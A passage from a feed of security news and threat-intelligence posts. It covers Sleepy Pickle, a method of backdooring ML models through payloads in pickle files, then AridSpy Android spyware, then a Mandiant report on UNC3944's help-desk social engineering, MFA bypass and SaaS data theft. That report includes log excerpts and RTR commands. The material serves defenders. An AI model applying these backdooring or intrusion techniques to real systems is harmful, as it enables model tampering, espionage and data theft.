While pickle is a widely used serialization format by ML libraries like PyTorch, it can be used to carry out arbitrary code execution attacks simply by loading a pickle file (i.e., during deserialization).

"We suggest loading models from users and organizations you trust, relying on signed commits, and/or loading models from [TensorFlow] or Jax formats with the from_tf=True auto-conversion mechanism," Hugging Face points out in its documentation.

Sleepy Pickle works by inserting a payload into a pickle file using open-source tools like Fickling, and then delivering it to a target host by using one of the four techniques such as an adversary-in-the-middle (AitM) attack, phishing, supply chain compromise, or the exploitation of a system weakness.

"When the file is deserialized on the victim's system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user," Milanov said.

Put differently, the payload injected into the pickle file containing the serialized ML model can be abused to alter model behavior by tampering with the model weights, or tampering with the input and output data processed by the model.

In a hypothetical attack scenario, the approach could be used to generate harmful outputs or misinformation that can have disastrous consequences to user safety (e.g., drink bleach to cure flu), steal user data when certain conditions are met, and attack users indirectly by generating manipulated summaries of news articles with links pointing to a phishing page.

Trail of Bits said that Sleepy Pickle can be weaponized by threat actors to maintain surreptitious access on ML systems in a manner that evades detection, given that the model is compromised when the pickle file is loaded in the Python process.

This is also more effective than directly uploading a malicious model to Hugging Face, as it can modify model behavior or output dynamically without having to entice their targets into downloading and running them.

"With Sleepy Pickle attackers can create pickle files that aren't ML models but can still corrupt local models if loaded together," Milanov said. "The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models."

"Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News

Arid Viper Launches Mobile Espionage Campaign with AridSpy Malware

Jun 13, 2024NewsroomThreat Intelligence / Mobile Security

The threat actor known as Arid Viper has been attributed to a mobile espionage campaign that leverages trojanized Android apps to deliver a spyware strain dubbed AridSpy.

"The malware is distributed through dedicated websites impersonating various messaging apps, a job opportunity app, and a Palestinian Civil Registry app," ESET researcher Lukáš Štefanko said in a report published today. "Often these are existing applications that had been trojanized by the addition of AridSpy's malicious code."

The activity is said to have spanned as many as five campaigns since 2022, with prior variants of AridSpy documented by Zimperium and 360 Beacon Labs. Three out of the five campaigns are still active.

Arid Viper, a suspected Hamas-affiliated actor who is also called APT-C-23, Desert Falcon, Grey Karkadann, Mantis, and Two-tailed Scorpion, has a long track record of using mobile malware since its emergence in 2017.

"Arid Viper has historically targeted military personnel in the Middle East, as well as journalists and dissidents," SentinelOne noted late last year, adding the group "continues to thrive in the mobile malware space."

ESET's analysis of the latest version of AridSpy shows that it has been transformed into a multi-stage trojan that can download additional payloads from a command-and-control (C2) server by the initial, trojanized app.

The attack chains mainly involve targeting users in Palestine and Egypt via bogus sites that function as distribution points for the booby-trapped apps.

Some of the fake-but-functional apps claim to be secure messaging services such as LapizaChat, NortirChat, and ReblyChat, each of which is based on legitimate apps like StealthChat, Session, and Voxer Walkie Talkie Messenger, while another app purports to be from the Palestinian Civil Registry.

The website for the Palestinian Civil Registry ("palcivilreg[.]com"), which was registered on May 30, 2023, has been also found to be advertised via a dedicated Facebook page that has 179 followers. The app propagated via the website is inspired by an app of the same name that's available on the Google Play Store.

"The malicious app available on palcivilreg[.]com is not a trojanized version of the app on Google Play; however, it uses that app's legitimate server to retrieve information," Štefanko said. "This means that Arid Viper was inspired by that app's functionality but created its own client layer that communicates with the legitimate server."

ESET said it further discovered AridSpy being disseminated under the guise of a job opportunity app from a website ("almoshell[.]website") registered in August 2023. A notable aspect of the app is that it's not based on any legitimate app.

Upon installation, the malicious app checks for the presence of security software against a hard-coded list, and proceeds further to download a first-stage payload only if none of them are installed on the device. The payload impersonates an update of Google Play Services.

"This payload works separately, without the necessity of having the trojanized app installed on the same device," Štefanko explained. "This means that if the victim uninstalls the initial trojanized app, for example LapizaChat, AridSpy will not be in any way affected."

The main responsibility of the first-stage is to download the next-stage component, which harbors the malicious functionality and makes use of a Firebase domain for C2 purposes.

The malware supports a wide range of commands to harvest data from the devices and can even deactivate itself or perform exfiltration when on a mobile data plan. Data exfiltration is initiated either by means of a command or when a specifically defined event is triggered.

"If the victim locks or unlocks the phone, AridSpy will take a picture using the front camera and send it to the exfiltration C&C server," Štefanko said. "Pictures are taken only if it is more than 40 minutes since the last picture was taken and the battery level is above 15%."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News

UNC3944 Targets SaaS Applications


UNC3944 is a financially motivated threat group that carries significant overlap with public reporting of "0ktapus," "Octo Tempest," "Scatter Swine," and "Scattered Spider," and has been observed adapting its tactics to include data theft from software-as-a-service (SaaS) applications to attacker-owned cloud storage objects (using cloud synchronization tools), persistence mechanisms against virtualization platforms, and lateral movement via SaaS permissions abuse. Active since at least May 2022, UNC3944 has leveraged underground communities like Telegram to acquire tools, services, and support to enhance their operations.

Initially, UNC3944 focused on credential harvesting and SIM swapping attacks in their operations, eventually migrating to ransomware and data theft extortion. However, recently, UNC3944 has shifted to primarily data theft extortion without the use of ransomware. This change in objectives has precipitated an expansion of targeted industries and organizations as evidenced by Mandiant investigations.

Evidence also suggests UNC3944 has occasionally resorted to fear mongering tactics to gain access to victim credentials. These tactics include threats of doxxing personal information, physical harm to victims and their families, and the distribution of compromising material.

This blog post aims to spotlight UNC3944's attacks against SaaS applications, providing insights into the group's evolving TTPs in line with its shifting mission objectives.

Tactics, Techniques, and Procedures (TTPs)

UNC3944 attack lifecycle

Figure 1: UNC3944 attack lifecycle

Mandiant has observed UNC3944 in multiple engagements leveraging social engineering techniques against corporate help desks to gain initial access to existing privileged accounts. Mandiant has analyzed several forensic recordings of these call center attacks, and of the observed recordings Mandiant noted the threat actors spoke with clear English and targeted accounts with high privilege potential. Additionally, it has been noted that they already possessed the personally identifiable information (PII) of its victims to bypass help desk administrators’ user identity verification. Mandiant observed use of verification information, such as the last four digits of Social Security numbers, dates of birth, manager names, and job titles with associated coworkers. The level of sophistication in these social engineering attacks is evident in both the extensive research performed on potential victims and the high success rate in said attacks.

UNC3944 operators employed consistent social engineering tactics across various victims, often calling service desks to claim they were receiving a new phone, warranting a multi-factor authentication (MFA) reset. By interacting with service desk administrators, UNC3944 could not only reset passwords for privileged accounts but also bypass associated MFA protections. The social engineering techniques went beyond the call centers as extensive SMS phishing campaigns were also observed. 

After successfully gaining initial access to victim environments, UNC3944 conducted internal reconnaissance of Microsoft applications, such as SharePoint, to enumerate remote connection requirements. UNC3944 frequently targeted internal help guides and documentation for virtual private networks (VPN), virtual desktop infrastructure (VDI), and remote telework utilities that were available on its victims’ SharePoint sites. UNC3944 abused existing legitimate third-party tooling for remote access to compromised environments.

UNC3944 has also leveraged Okta permissions abuse techniques through the self-assignment of a compromised account to every application in an Okta instance to expand the scope of intrusion beyond on-premises infrastructure to Cloud and SaaS applications. With this privilege escalation, the threat actor could not only abuse applications that leverage Okta for single sign-on (SSO), but also conduct internal reconnaissance through use of the Okta web portal by visually observing what application tiles were available after these role assignments.

Virtual Machine Compromise

An aspect of these intrusions involves a more aggressive method of persistence occurring through the creation of new virtual machines. In several instances, Mandiant observed UNC3944 access vSphere and Azure, using SSO applications, to create new virtual machines from which they conducted all follow-on activities. The importance here is the observation of abusing administrative groups or normal administrator permissions tied through SSO applications to then create this method of persistence.

Mandiant observed publicly available utilities such as MAS_AIO and privacy-script.bat to reconfigure the newly created virtual machine to deactivate various policies deemed contrary to privacy. This generally involved removing default Microsoft Defender protections as well as certain Windows telemetry that normally aids a forensic investigation. Additionally, a lack of endpoint monitoring allowed the group to download tools such as Mimikatz, ADRecon, and various covert tunneling tools, such as NGROK, RSOCX, and Localtonet. The use of these tools allowed UNC3944 access to the device without the need to use VPN or MFA. Other tooling included the installation of Python libraries, such as IMPACKET.

Tracking further activity from this device proves tedious when pivoting to cloud investigations. Due to the nature of cloud setups, all further cloud access was sourced from inside the compromised environment, meaning normal indicators of compromise such as poor reputation IP addresses don't effectively differentiate normal activity from threat actor activity. Despite this, Mandiant noted traditional browser artifact forensics still proved useful for tracking application accesses.

To bypass authentication controls, Mandiant has observed the use of an optical disc image file (ISO) called PCUnlocker. By attaching this ISO to existing virtual machines through the vCenter appliance, UNC3944 reset local administrator passwords allowing the bypass of normal domain controls. This ISO requires restarting and changing BIOS settings to boot into this mountable image to effectively subvert domain controls. Monitoring of virtual machine uptime or even brief impacts would allow for potential detection opportunities.

Additionally, in the past investigations, Mandiant has observed UNC3944 deploying ALPHV ransomware against the Virtual Machine File Systems, on the ESXI hypervisors themselves, to cause destructive actions inside of an environment. As a by-product of this activity, the attacker’s deployed virtual machines were usually encrypted and evidence of activities within the network was destroyed. Since early 2024, Mandiant has not observed ransomware deployment by this threat group; however, the potential to destroy or remove evidence is still a capability they leverage.

Despite anti-forensic measures, evidence showed that observed activity in victim environments was primarily aimed at discovering key infrastructure and potential exfiltration targets, such as databases and web content. Once located, data exfiltration occurred through these virtual machines to various high reputation resources such as Google Cloud Platform (GCP) and Amazon Web Services (AWS).

Pivot to SaaS Applications

In addition to traditional on-premises activity, Mandiant observed pivots into client SaaS applications. Traditionally used to centralize and increase security, in these instances they allowed access to applications hosted through MFA providers. Mandiant observed access to such applications as vCenter, CyberArk, SalesForce, Azure, CrowdStrike, AWS, and GCP. Figure 2 provides an excerpt from a single Okta SSO log entry associated with this activity.

    "timestamp": "2023-10-09T02:49:49.226Z",
    "user": "<redacted>",
    "account": "redacted<>@corp.<redacted_domain>.com",
    "source_ip": "",
    "service": "Crowdstrike Falcon",
    "sso_provider": "OKTA",
    "geoip_city": "<redacted>",
    "geoip_country_code": "US",
    "geoip_country_name": "United States",
    "geoip_organization": "Verizon Fios",
    "geoip_region": "NJ",
                "rawUserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; 
x64; rv:109.0) Gecko/20100101 Firefox/118.0",
                "os": "Windows 10",
                "browser": "FIREFOX"
            "zone": "null",
            "device": "Computer",
            "id": null,
            "ipAddress": "",
        "displayMessage": "User single sign on to app",
        "eventType": "user.authentication.sso",
            "result": "SUCCESS",
            "reason": null
        "published": "2023-10-09T02:49:49.226Z",
        "severity": "INFO",
                "audience": "
                "subject": "<redacted_username>@<redacted_domain>.com",
                "signOnMode": "SAML 2.0",
                "authenticationClassRef": "urn:oasis:names:tc:SAML:2.0:ac:
                "authTime": "2023-10-09T02:49:49.218Z",
                "requestUri": "/app/<redacted_domain>_crowdstrikefalcon_1/
                "issuer": "[redacted]",
                "url": "/app/<redacted_domain>_crowdstrikefalcon_1//sso/
                "initiationType": "IDP_INITIATED",
                "authnRequestId": "ZSM63wQkl6jH83LTuK9pEwAACzA",
                "requestId": "ZSNqTUXEzicJob0qyh4qzQAAAdw",
                "dtHash": "2f91954af8b8c55fa21b2de175ef84173abf820a7da3e
                "expiryTime": "2023-10-09T02:54:49.219Z",
                "issuedAt": "2023-10-09T02:49:49.218Z",
                "jti": "id35957951569260176516591432"

Figure 2: Okta SSO log excerpt associated with access of CrowdStrike Falcon console

Mandiant observed the use of endpoint detection and response tooling to further test access to the environment, such as the creation of API keys inside of CrowdStrike’s external console, which allowed the threat actor to execute commands within the Real Time Response (RTR) module such as whoami and quser. Figure 3 contains several events associated with UNC3944 commands executed in the Crowdstrike Falcon Real-Time-Response (RTR) module of a victim environment.

runscript -raw=```whoami``` -Timeout=```3600```runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl``` -Timeout=```3600```
runscript -raw=```curl -usebasicparsing``` -Timeout=```3600```
runscript -raw=```curl -usebasicparsing``` -Timeout=```3600```
runscript -raw=```curl -usebasicparsing``` -Timeout=```3600```
runscript -raw=```curl

Figure 3: Commands executed via CrowdStrike Falcon RTR module

UNC3944 continued to access Azure, CyberArk, Salesforce, and Workday and within each of these applications conducted further reconnaissance.

Specifically for CyberArk, Mandiant has observed the download and use of the PowerShell module psPAS specifically to programmatically interact with an organization’s CyberArk instance. This utility allows for faster enumeration of CyberArk vaults and makes further investigation more difficult as, without robust PowerShell logging, it is difficult to determine what commands were executed against a CyberArk instance.

After sufficient reconnaissance, Mandiant observed exfiltration from SaaS applications through cloud synchronization utilities, such as Airbyte and Fivetran, to move data from cloud-hosted data sources to external attacker-owned cloud storage resources, such as S3 buckets. These applications required only credentials and a path to the resources to sync the data to an external source automatically, often without the need for a subscription or expensive costs. Figure 4 contains an excerpt of Airbyte logs that Mandiant successfully acquired from an UNC3944 victim.

2023-10-09 15:42:01 destination > INFO a.m.s.StreamTransferManager
(uploadStreamPart):558 [Manager uploading to prodbucket11/salesforce
/Account/[redacted].csv with id XXdIBNCrR...uvUswAXY-]: Finished uploading 
[Part number 18 containing 10.01 MB]

2023-10-09 15:42:01 destination > INFO a.m.s.StreamTransferManager
(complete):395 [Manager uploading to prodbucket11/salesforce/Account
/[redacted].csv with id XXdIBNCrR...uvUswAXY-]: Completed
2023-10-09 15:42:01 destination > INFO i.a.i.d.s.S3StorageOperations
(loadDataIntoBucket):214 Uploaded buffer file to storage: [redacted].csv -> 
salesforce/Account/[redacted].csv (filename: [redacted].csv)

2023-10-09 15:42:01 destination > INFO i.a.i.d.s.S3StorageOperations
(uploadRecordsToBucket):131 Successfully loaded records to stage 
salesforce/Account/2023_10_09_1696844737410_ with 0 re-attempt(s)
2023-10-09 15:42:01 destination > INFO i.a.i.d.r.FileBuffer(deleteFile):109 
Deleting tempFile data [redacted].csv

2023-10-09 15:42:01 destination > INFO i.a.i.d.r.SerializedBufferingStrategy
(flushSingleBuffer):128 Flushing completed for Account

2023-10-09 15:42:01 destination > INFO i.a.i.d.r.SerializedBufferingStrategy
(lambda$getOrCreateBuffer$0):109 Starting a new buffer for stream Account 
(current state: -14332 bytes in 0 buffers)

2023-10-09 15:42:12 replication-orchestrator > Records read: 3635000 (18 GB)

Figure 4: Excerpt of Airbyte logs associated with data theft activity

ADFS Targeting

Mandiant has observed UNC3944 targeting Active Directory Federated Services (ADFS), when in use, specifically to export the ADFS certificates. With these certificates and through the use of a Golden SAML attack, easier and persistent access to cloud-based applications can occur. Correlating events on the ADFS to the service provider sign-in logs can assist with the detection of forged SAML tokens.

Dangers of SaaS Application Access

This current attack path highlights, in addition to traditional dangers of sensitive data storage, the dangers of storing data in SaaS-hosted applications. These risks are often overlooked as part of internal security due to traditional SaaS models offloading some risk to the application owner. As part of initial data reconnaissance, Mandiant has observed the use of advanced M365 capabilities, including Microsoft Office Delve, directly inside of an M365 tenant designed to highlight data sources a compromised account could access.

Delve allows users to quickly view and access files they have access to, whether it’s based on group membership or directly shared with a user. These personalized content recommendations include aggregated information from various sources within M365, such as files, emails, documents, and conversations. Delve also maps out organizational relationships, to include key members within the organization and the user’s direct management chain, and allows you to view recent documents associated with each member of your organization.

Although this is a useful feature for collaboration, UNC3944 has been observed leveraging this application for quick reconnaissance and datamining. Because these files are often sorted by most recent modified date, it also allows for quick identification of active projects, ongoing discussions, and the latest versions of potentially sensitive or confidential information.

"SearchQueryText: and(and(SharedWithUsersOwsUser:|<COMPROMISED.USER>
@, ContentType:Document), and(not(HideFromDelve:"1"), not(OnHold:"1"), 
not(Title:or(OneNote_DeletedPages, OneNote_RecycleBin)), 
not(IsOneNotePage:"1"), not(IsInRecycleBin:"1"), not(ContentType:Folder), 
not(ContentClass:or(STS_ListItem_Categories*, STS_ListItem_852*, 
STS_ListItem_GenericList*, STS_ListItem_544*, STS_ListItem_Tasks*, 
STS_Document*, STS_Site*)),

Figure 5: Example M365 Delve query

Mandiant has observed that these resources are generally excluded from security monitoring tools and have insufficient logging to record the full range of user activities. While SaaS applications such as Salesforce do not configure the logging verbosity based on the type of license a user has, the logging granularity is impacted by the configuration of debugging logs, the audit trail, and whether or not the add-on feature “Salesforce Shield” is enabled. 

Traditional on-premises security controls, such as firewalls and network flow sensors, are ineffective in detecting large outbound data transfers from SaaS platforms due to their networking configuration. This abstraction makes it difficult to identify data theft using traditional evidence sources like firewall and netflow logs. While historical analysis of SaaS and cloud logs can reveal data theft, real-time detection of this activity remains challenging.


Several courses of action can help to mitigate persistence or increased access in a targeted environment. Mandiant recommends utilizing both host-based certificates coupled with multi-factor authentication for any VPN access. Additionally, creating stricter conditional access policies to control what is visible inside of a cloud tenant can limit overall impact.

Multiple detection opportunities exist to assist with a speedier identification of possible compromise. Mandiant recommends heightened monitoring of SaaS applications, to include centralizing logs from important SaaS-based applications, MFA re-registrations, and virtual machine infrastructure, specifically about both uptime and the creation of new devices.

SaaS applications pose an interesting dilemma for organizations as there is a gray area of where and who should conduct monitoring to identify issues. For the applications where proprietary or guarded information exists, Mandiant recommends that an organization ensures they have a robust logging capability that their security teams can review for signs of malicious intent.

from Threat Intelligence